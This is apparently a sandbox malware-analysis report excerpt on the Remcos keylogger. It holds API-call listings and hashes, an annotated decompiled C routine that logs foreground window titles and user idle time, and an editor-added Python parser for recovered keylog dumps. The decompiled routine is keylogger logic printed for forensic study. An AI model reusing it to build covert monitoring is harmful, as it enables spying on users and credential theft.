                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                  • _wgetenv.MSVCRT ref: 00413720
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                  • GetLongPathNameW.KERNEL32 ref: 00413748
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 1999370131-1609423294
                                  • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                  • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                  Uniqueness
                                  • Uniqueness Score: -1.00%
                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 00405607
                                    • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                    • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                    • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                    • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                    • Part of subcall function 00405532: FindCloseChangeNotification.KERNEL32(00000000), ref: 004055AE
                                    • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 131886942-0
                                  • Opcode ID: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                  • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                  • Opcode Fuzzy Hash: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                  • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                   C-Code - Quality: 37%
                                   			// Editor's annotation: this is the window-title / idle-time logging thread of the
                                   			// Remcos keylogger. Every 500 ms it records the foreground window title when it
                                   			// changes, then watches the user's idle time and writes an idle marker once input
                                   			// resumes. The body is the decompiler output shown on the page; only the comments
                                   			// and the five temporaries the decompiler used without declaring were added.
                                   			E004059BE(intOrPtr __ecx) {
                                   				char _v5;
                                   				char _v6;
                                   				char _v7;
                                   				intOrPtr _v12;
                                   				signed int _v16;
                                   				char _v28;
                                   				char _v44;
                                   				char _v60;
                                   				char _v76;
                                   				void* _v92;
                                   				intOrPtr _t41;
                                   				struct HWND__* _t42;
                                   				int _t43;
                                   				CHAR* _t45;
                                   				signed int _t48;
                                   				char* _t58;
                                   				char* _t59;
                                   				struct HWND__* _t93;
                                   				intOrPtr _t94;
                                   				void* _t99;
                                   				intOrPtr _t112;
                                   				int _t9;            // added: used below but not declared in the decompiler output
                                   				intOrPtr _t71;      // added
                                   				int _t95;           // added
                                   				void* _t101;        // added
                                   				void* _t103;        // added
                                   
                                   				_v12 = __ecx;       // per-instance context; +0x3c / +0x3d hold the two enable flags
                                   				while(1) {
                                   					_t41 = _v12;
                                   					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                   						break;   // both flags cleared: the logging thread exits
                                   					}
                                   					if(( *0x41b990 & 0x00000001) == 0) {
                                   						 *0x41b990 =  *0x41b990 | 0x00000001;   // one-time initialisation guard
                                   						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                   						E00413E72(E00405BB5);   // registers E00405BB5 once (atexit-style; not resolved on this page)
                                   					}
                                   					Sleep(0x1f4); // executed   -- 500 ms poll interval
                                   					_t42 = GetForegroundWindow(); // executed
                                   					_t93 = _t42;
                                   					_t43 = GetWindowTextLengthA(_t93);
                                   					_t95 = _t43;
                                   					_t9 = _t95 + 1; // 0x1
                                   					_t45 = _t9;
                                   					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);   // std::string(len + 1, '\0') as the title buffer
                                   					if(_t43 != 0) {
                                   						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                   						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   						GetWindowTextA(_t93, _t45, _t45);   // read the foreground window title into the buffer
                                   						_t58 =  &_v44;
                                   						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);   // operator==: unchanged since last poll?
                                   						if(_t58 == 0) {
                                   							_t59 =  &_v44;
                                   							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);   // remember the new title at 0x41b998
                                   							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                   							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);   // drop the trailing NUL written by GetWindowTextA
                                   							_t112 =  *0x41b93e; // 0x0   -- delivery mode flag
                                   							if(_t112 == 0) {
                                   								_t103 = _t99 - 0x10;
                                   								L00414176();
                                   								L00414170();
                                   								_t99 = _t99 - 0x10 + 0x18;
                                   								// builds "\r\n[ <title> ]\r\n" and hands it to E004054E9, which appends to the log buffer and signals an event
                                   								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                   								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                   							} else {
                                   								_t99 = _t99 - 0x10;
                                   								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   								E00405DD3(_v12,  &_v44);   // alternative delivery path for the title (not resolved on this page)
                                   							}
                                   						}
                                   					}
                                   					_t94 = _v12;
                                   					_t71 = _t94; // executed
                                   					E00406C35(_t94); // executed   -- per-poll capture step; its E004054E9 call sites log "[End of clipboard text]", so most likely the clipboard check
                                   					if(E0041269B(_t94) < 0xea60) {   // idle time in ms; 0xea60 = 60 000 ms = 1 minute
                                   						L16:
                                   						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   						continue;
                                   					} else {
                                   						// user idle for at least a minute: keep sampling until input resumes
                                   						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
                                   							_t48 = E0041269B(_t71);
                                   							if(_t48 < 0xea60) {   // activity resumed: report the last idle reading in whole minutes
                                   								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);   // base 10; seconds below a full minute are dropped
                                   								_t101 = _t99 + 0xc - 0x10;
                                   								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                   								L00414176();
                                   								L00414170();
                                   								_t99 = _t99 + 0xc - 0x10 + 0x18;
                                   								// writes "\r\n{ User has been idle for <N> minutes }\r\n" to the log buffer
                                   								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                   								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   								goto L16;
                                   							}
                                   							_v16 = _t48;   // keep the most recent idle reading
                                   							Sleep(0x3e8);  // 1 s between idle checks
                                   						}
                                   						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   						break;
                                   					}
                                   				}
                                   				return 0;
                                   			}

                                   [Executed-address column for E004059BE (0x004059c7 through 0x00405bb4, one address per statement of the listing above) not reproduced; it no longer lines up with the code outside the original side-by-side layout.]

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                  • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                  • GetForegroundWindow.USER32 ref: 00405A12
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                  • GetWindowTextA.USER32 ref: 00405A52
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                  • _itoa.MSVCRT ref: 00405B3D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                  • String ID: [ ${ User has been idle for $ ]$ minutes }
                                  • API String ID: 615312007-3343415809
                                  • Opcode ID: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                  • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                  • Opcode Fuzzy Hash: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                  • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
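                                   The string constants in E004059BE above ("\r\n[ " + title + " ]\r\n" and "\r\n{ User has been idle for " + N + " minutes }\r\n"), together with "[End of clipboard text]" from the E004054E9 call sites, fix the record layout of the keylog this thread produces. The parser below is an editor-added example for an analyst who recovers such a dump; it is not code from the sample, from Joe Sandbox, or from the Remcos project. It splits the dump on those three markers and attributes typed text to the window it was captured in. The sample dump is constructed for the example; the on-disk file name, any encryption of the log, and a start-of-clipboard marker are not shown on this page and are not assumed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Record markers taken from the strings of E004059BE and its E004054E9 call sites on this page.
# A window record is written whenever the foreground title changes (500 ms poll); an idle record
# is written once input resumes after >= 60 s (0xEA60 ms) without activity.
MARKER_RE = re.compile(
    r"(?P<win>\r\n\[ (?P<title>[^\r\n]*?) \]\r\n)"
    r"|(?P<idle>\r\n\{ User has been idle for (?P<minutes>\d+) minutes \}\r\n)"
    r"|(?P<clip>\[End of clipboard text\])"
)


@dataclass
class Event:
    kind: str                 # "window", "keys", "idle" or "clipboard_end"
    window: Optional[str]     # foreground window the record belongs to, if one was seen
    text: str = ""            # captured keystrokes for "keys" records
    minutes: int = 0          # idle duration for "idle" records


def parse_keylog(data: str) -> List[Event]:
    """Split a keylog dump into records, attributing typed text to the current window."""
    events: List[Event] = []
    current: Optional[str] = None
    pos = 0
    for m in MARKER_RE.finditer(data):
        chunk = data[pos:m.start()]          # everything since the previous marker was typed
        if chunk:
            events.append(Event("keys", current, chunk))
        if m.group("win") is not None:
            current = m.group("title")
            events.append(Event("window", current))
        elif m.group("idle") is not None:
            events.append(Event("idle", current, minutes=int(m.group("minutes"))))
        else:
            events.append(Event("clipboard_end", current))
        pos = m.end()
    tail = data[pos:]
    if tail:
        events.append(Event("keys", current, tail))
    return events


def keystrokes_by_window(events: List[Event]) -> Dict[str, str]:
    """Concatenate captured keystrokes per window title ("<unknown>" before the first title)."""
    out: Dict[str, str] = {}
    for ev in events:
        if ev.kind == "keys":
            key = ev.window if ev.window is not None else "<unknown>"
            out[key] = out.get(key, "") + ev.text
    return out


def total_idle_minutes(events: List[Event]) -> int:
    """Sum of the idle markers; the sample rounds each gap down to whole minutes."""
    return sum(ev.minutes for ev in events if ev.kind == "idle")


def windows_visited(events: List[Event]) -> List[str]:
    """Distinct window titles in first-seen order."""
    seen: List[str] = []
    for ev in events:
        if ev.kind == "window" and ev.window is not None and ev.window not in seen:
            seen.append(ev.window)
    return seen


# Constructed sample dump in the layout the markers imply; not data from the analysis.
SAMPLE_LOG = (
    "\r\n[ Inbox - Outlook ]\r\n"
    "dear team please find"
    "\r\n[ Login - Corporate VPN ]\r\n"
    "jdoe\tP@ssw0rd!\r"
    "\r\n{ User has been idle for 3 minutes }\r\n"
    "\r\n[ Inbox - Outlook ]\r\n"
    "https://example.invalid/login[End of clipboard text]"
    "thanks"
)

if __name__ == "__main__":
    for ev in parse_keylog(SAMPLE_LOG):
        print(ev)
```

Two limits of the recovered timeline follow directly from the code above and matter when this output is used as evidence: the title is only compared against the previous one every 500 ms, so keystrokes sent to a window that appeared and vanished between two polls are attributed to the preceding title; and an idle record is only written when input resumes, with the duration integer-divided by 60 000 ms, so a gap at the very end of a capture is absent and every reported gap under-states the true idle time by up to 59 seconds.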

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                  • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                  • WaitForSingleObject.KERNEL32(00000408,000000FF), ref: 00402389
                                  • CloseHandle.KERNEL32(00000408), ref: 00402392
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6B015DF0), ref: 004023A7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
